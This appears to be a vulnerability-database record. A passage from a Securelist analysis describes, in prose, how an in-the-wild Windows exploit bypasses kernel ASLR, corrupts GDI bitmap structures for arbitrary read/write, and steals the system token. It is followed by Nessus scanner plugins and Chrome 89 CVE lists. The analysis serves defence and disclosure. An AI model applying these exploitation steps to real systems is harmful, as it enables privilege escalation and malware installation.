To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). 
The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. 
The reward was donated to charity and Google matched the donation._

Source record: SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7 (type securelist), "The zero-day exploits of Operation WizardOpium", published and modified 2020-05-28T10:00:09, https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/, CVSS 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C).

Nessus plugin GOOGLE_CHROME_89_0_4389_72.NASL (https://www.tenable.com/plugins/nessus/146948), "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", type nessus, family scanner, published 2021-03-02, last seen 2021-03-16T11:26:03, CPE cpe:/a:google:chrome, CVSS 8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C), CVSSv3 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H), covering CVE-2020-27844 and CVE-2021-21159 through CVE-2021-21190.

Description: The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.

See also: https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html. Solution: Upgrade to Google Chrome version 89.0.4389.72 or later. Exploitability ease: No known exploits are available. Vulnerability publication date 2021/01/05, patch publication date 2021/03/02, plugin publication date 2021/03/02. The plugin is a local check (script_dependencies google_chrome_installed.nasl) that compares the installed version against fix 89.0.4389.72 at severity SECURITY_HOLE.

Nessus plugin MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL (https://www.tenable.com/plugins/nessus/147192), "Microsoft Edge (Chromium) < 89.0.774.45 Multiple Vulnerabilities", type nessus, family scanner, published 2021-03-08, last seen 2021-03-16T12:01:15, CPE cpe:/a:microsoft:edge, CVSS 8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C), CVSSv3 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H), covering the same CVE set (CVE-2020-27844 and CVE-2021-21159 through CVE-2021-21190).

Description: The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.45. It is, therefore, affected by multiple vulnerabilities as referenced in the March 4, 2021 advisory.

- A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2020-27844)

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.

See also: https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-4-2021. Solution: Upgrade to Microsoft Edge version 89.0.774.45 or later. Exploitability ease: No known exploits are available. Vulnerability publication date 2021/01/05, patch publication date 2021/03/04, plugin publication date 2021/03/08. The plugin is a local check (script_dependencies microsoft_edge_chromium_installed.nbin) that compares the installed version against fixed_version 89.0.774.45 at severity SECURITY_HOLE.

Record last seen 2021-03-17T03:00:29. Description: Chrome Releases reports:

This release includes 47 security fixes, including the below. Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild.

- [1171049] High CVE-2021-21159: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-01-27
- [1170531] High CVE-2021-21160: Heap buffer overflow in WebAudio. Reported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25
- [1173702] High CVE-2021-21161: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-02-02
- [1172054] High CVE-2021-21162: Use after free in WebRTC. Reported by Anonymous on 2021-01-29
- [1111239] High CVE-2021-21163: Insufficient data validation in Reader Mode. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2020-07-30
- [1164846] High CVE-2021-21164: Insufficient data validation in Chrome for iOS.
Reported by Muneaki Nishimura (nishimunea) on\n2021-01-11\n\n- [1174582] High CVE-2021-21165: Object life cycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-04\n\n- [1177465] High CVE-2021-21166: Object lifecycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-11\n\n- [1161144] Medium CVE-2021-21167: Use after free in bookmarks.\nReported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n- [1152226] Medium CVE-2021-21168: Insufficient policy enforcement in\nappcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n- [1166138] Medium CVE-2021-21169: Out of bounds memory access in V8.\nReported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent\nSecurity Xuanwu Lab on 2021-01-13\n\n- [1111646] Medium CVE-2021-21170: Incorrect security UI in Loader.\nReported by David Erceg on 2020-07-31\n\n- [1152894] Medium CVE-2021-21171: Incorrect security UI in TabStrip\nand Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n- [1150810] Medium CVE-2021-21172: Insufficient policy enforcement in\nFile System API. Reported by Maciej Pulikowski on 2020-11-19\n\n- [1154250] Medium CVE-2021-21173: Side-channel information leakage in\nNetwork Internals. Reported by Tom Van Goethem from imec-DistriNet, KU\nLeuven on 2020-12-01\n\n- [1158010] Medium CVE-2021-21174: Inappropriate implementation in\nReferrer. Reported by Ashish Gautam Kamble on 2020-12-11\n\n- [1146651] Medium CVE-2021-21175: Inappropriate implementation in\nSite isolation. Reported by Jun Kokatsu, Microsoft Browser\nVulnerability Research on 2020-11-07\n\n- [1170584] Medium CVE-2021-21176: Inappropriate implementation in\nfull screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n- [1173879] Medium CVE-2021-21177: Insufficient policy enforcement in\nAutofill. 
Reported by Abdulrahman Alqabandi, Microsoft Browser\nVulnerability Research on 2021-02-03\n\n- [1174186] Medium CVE-2021-21178: Inappropriate implementation in\nCompositing. Reported by Japong on 2021-02-03\n\n- [1174943] Medium CVE-2021-21179: Use after free in Network\nInternals. Reported by Anonymous on 2021-02-05\n\n- [1175507] Medium CVE-2021-21180: Use after free in tab search.\nReported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability\nResearch on 2021-02-07\n\n- [1177875] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG.\nReported by Sean Campbell at Tableau on 2021-02-12\n\n- [1182767] Medium CVE-2021-21181: Side-channel information leakage in\nautofill. Reported by Xu Lin (University of Illinois at Chicago),\nPanagiotis Ilia (University of Illinois at Chicago), Jason Polakis\n(University of Illinois at Chicago) on 2021-02-26\n\n- [1049265] Low CVE-2021-21182: Insufficient policy enforcement in\nnavigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n- [1105875] Low CVE-2021-21183: Inappropriate implementation in\nperformance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n2020-07-15\n\n- [1131929] Low CVE-2021-21184: Inappropriate implementation in\nperformance APIs. Reported by James Hartig on 2020-09-24\n\n- [1100748] Low CVE-2021-21185: Insufficient policy enforcement in\nextensions. Reported by David Erceg on 2020-06-30\n\n- [1153445] Low CVE-2021-21186: Insufficient policy enforcement in QR\nscanning. Reported by dhirajkumarnifty on 2020-11-28\n\n- [1155516] Low CVE-2021-21187: Insufficient data validation in URL\nformatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n- [1161739] Low CVE-2021-21188: Use after free in Blink. Reported by\nWoojin Oh(@pwn_exploit) of STEALIEN on 2020-12-24\n\n- [1165392] Low CVE-2021-21189: Insufficient policy enforcement in\npayments. Reported by Khalil Zhani on 2021-01-11\n\n- [1166091] Low CVE-2021-21190: Uninitialized Use in PDFium. 
Reported\nby Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-05T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-05T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/147152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147152);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\"CVE-2020-27844\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21164\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\");\n\n 
script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Releases reports :\n\nThis release includes 47 security fixes, including the below. Google\nis aware of reports that an exploit for CVE-2021-21166 exists in the\nwild.\n\n- [1171049] High CVE-2021-21159: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-01-27\n\n- [1170531] High CVE-2021-21160: Heap buffer overflow in WebAudio.\nReported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25\n\n- [1173702] High CVE-2021-21161: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-02-02\n\n- [1172054] High CVE-2021-21162: Use after free in WebRTC. Reported by\nAnonymous on 2021-01-29\n\n- [1111239] High CVE-2021-21163: Insufficient data validation in\nReader Mode. Reported by Alison Huffman, Microsoft Browser\nVulnerability Research on 2020-07-30\n\n- [1164846] High CVE-2021-21164: Insufficient data validation in\nChrome for iOS. Reported by Muneaki Nishimura (nishimunea) on\n2021-01-11\n\n- [1174582] High CVE-2021-21165: Object life cycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-04\n\n- [1177465] High CVE-2021-21166: Object lifecycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-11\n\n- [1161144] Medium CVE-2021-21167: Use after free in bookmarks.\nReported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n- [1152226] Medium CVE-2021-21168: Insufficient policy enforcement in\nappcache. 
Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n- [1166138] Medium CVE-2021-21169: Out of bounds memory access in V8.\nReported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent\nSecurity Xuanwu Lab on 2021-01-13\n\n- [1111646] Medium CVE-2021-21170: Incorrect security UI in Loader.\nReported by David Erceg on 2020-07-31\n\n- [1152894] Medium CVE-2021-21171: Incorrect security UI in TabStrip\nand Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n- [1150810] Medium CVE-2021-21172: Insufficient policy enforcement in\nFile System API. Reported by Maciej Pulikowski on 2020-11-19\n\n- [1154250] Medium CVE-2021-21173: Side-channel information leakage in\nNetwork Internals. Reported by Tom Van Goethem from imec-DistriNet, KU\nLeuven on 2020-12-01\n\n- [1158010] Medium CVE-2021-21174: Inappropriate implementation in\nReferrer. Reported by Ashish Gautam Kamble on 2020-12-11\n\n- [1146651] Medium CVE-2021-21175: Inappropriate implementation in\nSite isolation. Reported by Jun Kokatsu, Microsoft Browser\nVulnerability Research on 2020-11-07\n\n- [1170584] Medium CVE-2021-21176: Inappropriate implementation in\nfull screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n- [1173879] Medium CVE-2021-21177: Insufficient policy enforcement in\nAutofill. Reported by Abdulrahman Alqabandi, Microsoft Browser\nVulnerability Research on 2021-02-03\n\n- [1174186] Medium CVE-2021-21178: Inappropriate implementation in\nCompositing. Reported by Japong on 2021-02-03\n\n- [1174943] Medium CVE-2021-21179: Use after free in Network\nInternals. Reported by Anonymous on 2021-02-05\n\n- [1175507] Medium CVE-2021-21180: Use after free in tab search.\nReported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability\nResearch on 2021-02-07\n\n- [1177875] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG.\nReported by Sean Campbell at Tableau on 2021-02-12\n\n- [1182767] Medium CVE-2021-21181: Side-channel information leakage in\nautofill. 
Reported by Xu Lin (University of Illinois at Chicago),\nPanagiotis Ilia (University of Illinois at Chicago), Jason Polakis\n(University of Illinois at Chicago) on 2021-02-26\n\n- [1049265] Low CVE-2021-21182: Insufficient policy enforcement in\nnavigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n- [1105875] Low CVE-2021-21183: Inappropriate implementation in\nperformance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n2020-07-15\n\n- [1131929] Low CVE-2021-21184: Inappropriate implementation in\nperformance APIs. Reported by James Hartig on 2020-09-24\n\n- [1100748] Low CVE-2021-21185: Insufficient policy enforcement in\nextensions. Reported by David Erceg on 2020-06-30\n\n- [1153445] Low CVE-2021-21186: Insufficient policy enforcement in QR\nscanning. Reported by dhirajkumarnifty on 2020-11-28\n\n- [1155516] Low CVE-2021-21187: Insufficient data validation in URL\nformatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n- [1161739] Low CVE-2021-21188: Use after free in Blink. Reported by\nWoojin Oh(@pwn_exploit) of STEALIEN on 2020-12-24\n\n- [1165392] Low CVE-2021-21189: Insufficient policy enforcement in\npayments. Reported by Khalil Zhani on 2021-01-11\n\n- [1166091] Low CVE-2021-21190: Uninitialized Use in PDFium. 
Reported\nby Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13\"\n );\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc64b00e\"\n );\n # https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b92bef2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<89.0.4389.72\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-03-16T11:52:05", "description": "The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. 
Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-02T00:00:00", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146949", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146949);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/15\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n 
\"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google 